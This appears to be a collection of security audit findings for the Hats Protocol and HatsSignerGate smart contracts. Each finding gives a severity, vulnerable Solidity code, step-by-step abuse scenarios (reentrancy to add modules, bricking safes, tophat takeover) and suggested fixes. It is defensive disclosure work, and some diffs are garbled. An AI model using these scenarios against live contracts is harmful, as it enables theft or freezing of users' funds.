is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n\\nSo there are now 11 owners and 11 valid signers. This means when `reconcileSignerCount` is called, the following lines cause a revert:\\n```\\n function reconcileSignerCount() public {\\n address[] memory owners = safe.getOwners();\\n uint256 validSignerCount = _countValidSigners(owners);\\n\\n // 11 > 10\\n if (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n }\\n```\\n
The `HatsSignerGate.claimSigner` and `MultiHatsSignerGate.claimSigner` functions should call `reconcileSignerCount` such that they work with the correct amount of signers and the scenario described in this report cannot occur.\\n```\\ndiff --git a/src/HatsSignerGate.sol b/src/HatsSignerGate.sol\\nindex 7a02faa..949d390 100644\\n--- a/src/HatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/HatsSignerGate.sol\\n@@ -34,6 // Add the line below\\n34,8 @@ contract HatsSignerGate is HatsSignerGateBase {\\n /// @notice Function to become an owner on the safe if you are wearing the signers hat\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n function claimSigner() public virtual {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n\\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n\\n```\\ndiff --git a/src/MultiHatsSignerGate.sol b/src/MultiHatsSignerGate.sol\\nindex da74536..57041f6 100644\\n--- a/src/MultiHatsSignerGate.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/src/MultiHatsSignerGate.sol\\n@@ -39,6 // Add the line below\\n39,8 @@ contract MultiHatsSignerGate is HatsSignerGateBase {\\n /// @dev Reverts if `maxSigners` has been reached, the caller is either invalid or has already claimed. Swaps caller with existing invalid owner if relevant.\\n /// @param _hatId The hat id to claim signer rights for\\n function claimSigner(uint256 _hatId) public {\\n// Add the line below\\n reconcileSignerCount();\\n// Add the line below\\n \\n uint256 maxSigs = maxSigners; // save SLOADs\\n uint256 currentSignerCount = signerCount;\\n```\\n
As mentioned before, we end up in a situation where one of the valid signers has to give up his signer hat in order for the HSG to become operable again.\\nSo one of the valid signers that has rightfully claimed his spot as a signer may lose his privilege to sign transactions.
```\\n // 9 >= 10 is false\\n if (currentSignerCount >= maxSigs) {\\n revert MaxSignersReached();\\n }\\n\\n // msg.sender is a new signer so he is not yet owner\\n if (safe.isOwner(msg.sender)) {\\n revert SignerAlreadyClaimed(msg.sender);\\n }\\n\\n // msg.sender is a valid signer, he wears the signer hat\\n if (!isValidSigner(msg.sender)) {\\n revert NotSignerHatWearer(msg.sender);\\n }\\n```\\n
Signers can brick safe by adding unlimited additional signers while avoiding checks
high
There are a number of checks in `checkAfterExecution()` to ensure that the signers cannot perform any illegal actions to exert too much control over the safe. However, there is no check to ensure that additional owners are not added to the safe. This could be done in a way that pushes the total over `maxSigners`, which will cause all future transactions to revert.\\nThis means that signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, owners can also be added by a normal `execTransaction` function. In this case, there are very few checks (all of which could easily or accidentally be missed) to stop us from adding too many owners:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nThat means that either in the case that (a) the safe's threshold is already at `targetThreshold` or (b) the owners being added are currently toggled off or have eligibility turned off, this check will pass and the owners will be added.\\nOnce they are added, all future transactions will fail. Each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert as long as the new owners are now activated as valid signers.\\nIn the worst case scenario, valid signers wearing an immutable hat are added as owners when the safe's threshold is already above `targetThreshold`. The check passes, but the new owners are already valid signers. There is no admin action that can revoke the validity of their hats, so the `reconcileSignerCount()` function will always revert, and therefore the safe is unusable.\\nSince `maxSigners` is immutable and can't be changed, the only solution is for the hat wearers to renounce their hats. Otherwise, the safe will remain unusable with all funds trapped inside.
There should be a check in `checkAfterExecution()` that ensures that the number of owners on the safe has not changed throughout the execution.\\nIt also may be recommended that the `maxSigners` value is adjustable by the contract owner.
Signers can easily collude to freeze the contract, giving themselves the power to hold the protocol ransom to unfreeze the safe and all funds inside it.\\nIn a less malicious case, signers might accidentally add too many owners and end up needing to manage the logistics of having users renounce their hats.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n
Other module can add owners to safe that push us above maxSigners, bricking safe
high
If another module adds owners to the safe, these additions are not checked by our module or guard's logic. This can result in pushing us over `maxSigners`, which will cause all transactions to revert. In the case of an immutable hat, the only way to avoid the safe being locked permanently (with all funds frozen) may be to convince many hat wearers to renounce their hats.\\nWhen new owners are added to the contract through the `claimSigner()` function, the total number of owners is compared to `maxSigners` to ensure it doesn't exceed it.\\nHowever, if there are other modules on the safe, they are able to add additional owners without these checks.\\nIn the case of `HatsSignerGate.sol`, there is no need to call `claimSigner()` to "activate" these owners. They will automatically be valid as long as they are a wearer of the correct hat.\\nThis could lead to an issue where many (more than maxSigners) wearers of an immutable hat are added to the safe as owners. Now, each time a transaction is processed, `checkTransaction()` is called, which calls `reconcileSignerCount()`, which has the following check:\\n```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n\\nThis will revert.\\nWorse, there is nothing the admin can do about it. If they don't have control over the eligibility address for the hat, they are not able to burn the hats or transfer them.\\nThe safe will be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.
If `validSignerCount > maxSigners`, there should be some mechanism to reduce the number of signers rather than reverting.\\nAlternatively, as suggested in another issue, to get rid of all the potential risks of having other modules able to make changes outside of your module's logic, we should create the limit that the HatsSignerGate module can only exist on a safe with no other modules.
The safe can be permanently bricked and unable to perform transactions unless the hat wearers agree to renounce their hats.
```\\nif (validSignerCount > maxSigners) {\\n revert MaxSignersReached();\\n}\\n```\\n
If another module adds a module, the safe will be bricked
high
If a module is added by another module, it will bypass the `enableNewModule()` function that increments `enabledModuleCount`. This will throw off the module validation in `checkTransaction()` and `checkAfterExecution()` and could cause the safe to become permanently bricked.\\nIn order to ensure that signers cannot add new modules to the safe (thus giving them unlimited future governing power), the guard portion of the gate checks that the hash of the modules before the transaction is the same as the hash after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nYou'll note that the "before" check uses `enabledModuleCount` and the "after" check uses `enabledModuleCount + 1`. The reason for this is that we want to be able to catch whether the user added a new module, which requires us taking a larger pagination to make sure we can view the additional module.\\nHowever, if we were to start with a number of modules larger than `enabledModuleCount`, the result would be that the "before" check would clip off the final modules, and the "after" check would include them, thus leading to different hashes.\\nThis situation can only arise if a module is added that bypasses the `enableModule()` function. But this exact situation can happen if one of the other modules on the safe adds a module to the safe.\\nIn this case, the modules on the safe will increase but `enabledModuleCount` will not. This will lead to the "before" and "after" checks returning different arrays each time, and therefore disallowing transactions.\\nThe only possible ways to fix this problem will be to have the other module remove the additional one they added. But, depending on the specific circumstances, this option may not be possible. For example, the module that performed the adding may not have the ability to remove modules.
The module guarding logic needs to be rethought. Given the large number of unbounded risks it opens up, I would recommend not allowing other modules on any safes that use this functionality.
The safe can be permanently bricked, with the guard functions disallowing any transactions. All funds in the safe will remain permanently stuck.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
Signers can bypass checks to add new modules to a safe by abusing reentrancy
high
The `checkAfterExecution()` function has checks to ensure that new modules cannot be added by signers. This is a crucial check, because adding a new module could give them unlimited power to make any changes (with no guards in place) in the future. However, by abusing reentrancy, the parameters used by the check can be changed so that this crucial restriction is violated.\\nThe `checkAfterExecution()` is intended to uphold important invariants after each signer transaction is completed. This is intended to restrict certain dangerous signer behaviors, the most important of which is adding new modules. This was an issue caught in the previous audit and fixed by comparing the hash of the modules before execution to the has of the modules after.\\nBefore:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nThis is further emphasized in the comments, where it is specified:\\n/// @notice Post-flight check to prevent `safe` signers from removing this contract guard, changing any modules, or changing the threshold\\nWhy Restricting Modules is Important\\nModules are the most important thing to check. This is because modules have unlimited power not only to execute transactions but to skip checks in the future. Creating an arbitrary new module is so bad that it is equivalent to the other two issues together: getting complete control over the safe (as if threshold was set to 1) and removing the guard (because they aren't checked in module transactions).\\nHowever, this important restriction can be violated by abusing reentrancy into this function.\\nReentrancy Disfunction\\nTo see how this is possible, we first have to take a quick detour regarding reentrancy. It appears that the protocol is attempting to guard against reentrancy with the `guardEntries` variable. It is incremented in `checkTransaction()` (before a transaction is executed) and decremented in `checkAfterExecution()` (after the transaction has completed).\\nThe only protection it provides is in its risk of underflowing, explained in the comments as:\\n// leave checked to catch underflows triggered by re-erntry attempts\\nHowever, any attempt to reenter and send an additional transaction midstream of another transaction would first trigger the `checkTransaction()` function. This would increment `_guardEntries` and would lead to it not underflowing.\\nIn order for this system to work correctly, the `checkTransaction()` function should simply set `_guardEntries = 1`. This would result in an underflow with the second decrement. But, as it is currently designed, there is no reentrancy protection.\\nUsing Reentrancy to Bypass Module Check\\nRemember that the module invariant is upheld by taking a snapshot of the hash of the modules in `checkTransaction()` and saving it in the `_existingModulesHash` variable.\\nHowever, imagine the following set of transactions:\\nSigners send a transaction via the safe, and modules are snapshotted to `_existingModulesHash`\\nThe transaction uses the Multicall functionality of the safe, and performs the following actions:\\nFirst, it adds the malicious module to the safe\\nThen, it calls `execTransaction()` on itself with any another transaction\\nThe second call will call `checkTransaction()`\\nThis will update `_existingModulesHash` to the new list of modules, including the malicious one\\nThe second call will execute, which doesn't matter (could just be an empty transaction)\\nAfter the transaction, `checkAfterExecution()` will be called, and the modules will match\\nAfter the full transaction is complete, `checkAfterExecution()` will be called for the first transaction, but since `_existingModulesHash` will be overwritten, the module check will pass
Use a more typical reentrancy guard format, such as checking to ensure `_guardEntries == 0` at the top of `checkTransaction()` or simply setting `_guardEntries = 1` in `checkTransaction()` instead of incrementing it.
Any number of signers who are above the threshold will be able to give themselves unlimited access over the safe with no restriction going forward.
```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n
Unlinked tophat retains linkedTreeRequests, can be rugged
high
When a tophat is unlinked from its admin, it is intended to regain its status as a tophat that is fully self-sovereign. However, because the `linkedTreeRequests` value isn't deleted, an independent tophat could still be vulnerable to "takeover" from another admin and could lose its sovereignty.\\nFor a tophat to get linked to a new tree, it calls `requestLinkTopHatToTree()` function:\\n```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n\\nThis creates a "request" to link to a given admin, which can later be approved by the admin in question:\\n```\\nfunction approveLinkTopHatToTree(uint32 _topHatDomain, uint256 _newAdminHat) external {\\n // for everything but the last hat level, check the admin of `_newAdminHat`'s theoretical child hat, since either wearer or admin of `_newAdminHat` can approve\\n if (getHatLevel(_newAdminHat) < MAX_LEVELS) {\\n _checkAdmin(buildHatId(_newAdminHat, 1));\\n } else {\\n // the above buildHatId trick doesn't work for the last hat level, so we need to explicitly check both admin and wearer in this case\\n _checkAdminOrWearer(_newAdminHat);\\n }\\n\\n // Linkages must be initiated by a request\\n if (_newAdminHat != linkedTreeRequests[_topHatDomain]) revert LinkageNotRequested();\\n\\n // remove the request -- ensures all linkages are initialized by unique requests,\\n // except for relinks (see `relinkTopHatWithinTree`)\\n delete linkedTreeRequests[_topHatDomain];\\n\\n // execute the link. Replaces existing link, if any.\\n _linkTopHatToTree(_topHatDomain, _newAdminHat);\\n}\\n```\\n\\nThis function shows that if there is a pending `linkedTreeRequests`, then the admin can use that to link the tophat into their tree and claim authority over it.\\nWhen a tophat is unlinked, it is expected to regain its sovereignty:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n\\nHowever, this function does not delete `linkedTreeRequests`.\\nTherefore, the following set of actions is possible:\\nTopHat is linked to Admin A\\nAdmin A agrees to unlink the tophat\\nAdmin A calls `requestLinkTopHatToTree` with any address as the admin\\nThis call succeeds because Admin A is currently an admin for TopHat\\nAdmin A unlinks TopHat as promised\\nIn the future, the address chosen can call `approveLinkTopHatToTree` and take over admin controls for the TopHat without the TopHat's permission
In `unlinkTopHatFromTree()`, the `linkedTreeRequests` should be deleted:\\n```\\nfunction unlinkTopHatFromTree(uint32 _topHatDomain) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n _checkAdmin(fullTopHatId);\\n\\n delete linkedTreeAdmins[_topHatDomain];\\n// Add the line below\\n delete linkedTreeRequests[_topHatDomain];\\n emit TopHatLinked(_topHatDomain, 0);\\n}\\n```\\n
Tophats that expect to be fully self-sovereign and without any oversight can be surprisingly claimed by another admin, because settings from a previous admin remain through unlinking.
```\\nfunction requestLinkTopHatToTree(uint32 _topHatDomain, uint256 _requestedAdminHat) external {\\n uint256 fullTopHatId = uint256(_topHatDomain) << 224; // (256 - TOPHAT_ADDRESS_SPACE);\\n\\n _checkAdmin(fullTopHatId);\\n\\n linkedTreeRequests[_topHatDomain] = _requestedAdminHat;\\n emit TopHatLinkRequested(_topHatDomain, _requestedAdminHat);\\n}\\n```\\n
Owners can be swapped even though they still wear their signer hats
medium
`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Issue Owners can be swapped even though they still wear their signer hats\\nPerform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.
bypass restrictions and perform action that should be disallowed.
```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Unbound recursive function call can use unlimited gas and break hats operation
medium
some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 "root hat" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 "root hat" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.
code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)
it won't be possible to perform actions for those hats and funds can be lost because of it.
```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n
The Hats contract needs to override the ERC1155.balanceOfBatch function
medium
The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, "LENGTH_MISMATCH");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n
Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.
This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects
```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n
[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`
medium
`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.
Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n
This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.
```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n
Safe threshold can be set above target threshold, causing transactions to revert
medium
If a `targetThreshold` is set below the safe's threshold, the `reconcileSignerCount()` function will fail to adjust the safe's threshold as it should, leading to a mismatch that causes all transactions to revert.\\nIt is possible and expected that the `targetThreshold` can be lowered, sometimes even lower than the current safe threshold.\\nIn the `setTargetThreshold()` function, there is an automatic update to lower the safe threshold accordingly. However, in the event that the `signerCount < 2`, it will not occur. This could easily happen if, for example, the hat is temporarily toggled off.\\nBut this should be fine! In this instance, when a new transaction is processed, `checkTransaction()` will be called, which calls `reconcileSignerCount()`. This should fix the problem by resetting the safe's threshold to be within the range of `minThreshold` to `targetThreshold`.\\nHowever, the logic to perform this update is faulty.\\n```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n\\nAs you can see, in the event that the `validSignerCount` is lower than the target threshold, we update the safe's threshold to `validSignerCount`. That is great.\\nIn the event that `validSignerCount` is greater than threshold, we should be setting the safe's threshold to `targetThreshold`. However, this only happens in the `else if` clause, when `currentThreshold < target`.\\nAs a result, in the situation where `target < current <= validSignerCount`, we will leave the current safe threshold as it is and not lower it. This results in a safe threshold that is greater than `targetThreshold`.\\nHere is a simple example:\\nvalid signers, target threshold, and safe's threshold are all 10\\nthe hat is toggled off\\nwe lower target threshold to 9\\nthe hat is toggled back on\\n`if` block above (validSignerCount <= target && validSignerCount != currentThreshold) fails because `validSignerCount > target`\\nelse `if` block above (validSignerCount > target && currentThreshold < target) fails because `currentThreshold > target`\\nas a result, `newThreshold == 0` and the safe isn't updated\\nthe safe's threshold remains at 10, which is greater than target threshold\\nIn the `checkAfterExecution()` function that is run after each transaction, there is a check that the threshold is valid:\\n```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n\\nThe `_getCorrectThreshold()` function checks if the threshold is equal to the valid signer count, bounded by the `minThreshold` on the lower end, and the `targetThreshold` on the upper end:\\n```\\nfunction _getCorrectThreshold() internal view returns (uint256 _threshold) {\\n uint256 count = _countValidSigners(safe.getOwners());\\n uint256 min = minThreshold;\\n uint256 max = targetThreshold;\\n if (count < min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nSince our threshold is greater than `targetThreshold` this check will fail and all transactions will revert.
Edit the if statement in `reconcileSignerCount()` to always lower to the `targetThreshold` if it exceeds it:\\n```\\n// Remove the line below\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n// Add the line below\\nif (validSignerCount <= target) {\\n newThreshold = validSignerCount;\\n// Remove the line below\\n} else if (validSignerCount > target && currentThreshold < target) {\\n// Add the line below\\n} else {\\n newThreshold = target;\\n}\\n// Remove the line below\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n// Add the line below\\nif (newThreshold != currentThreshold) { // rest of code update safe threshold // rest of code }\\n```\\n
A simple change to the `targetThreshold` fails to propagate through to the safe's threshold, which causes all transactions to revert.
```\\nuint256 currentThreshold = safe.getThreshold();\\nuint256 newThreshold;\\nuint256 target = targetThreshold; // save SLOADs\\n\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\nif (newThreshold > 0) { // rest of code update safe threshold // rest of code }\\n```\\n
If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked
medium
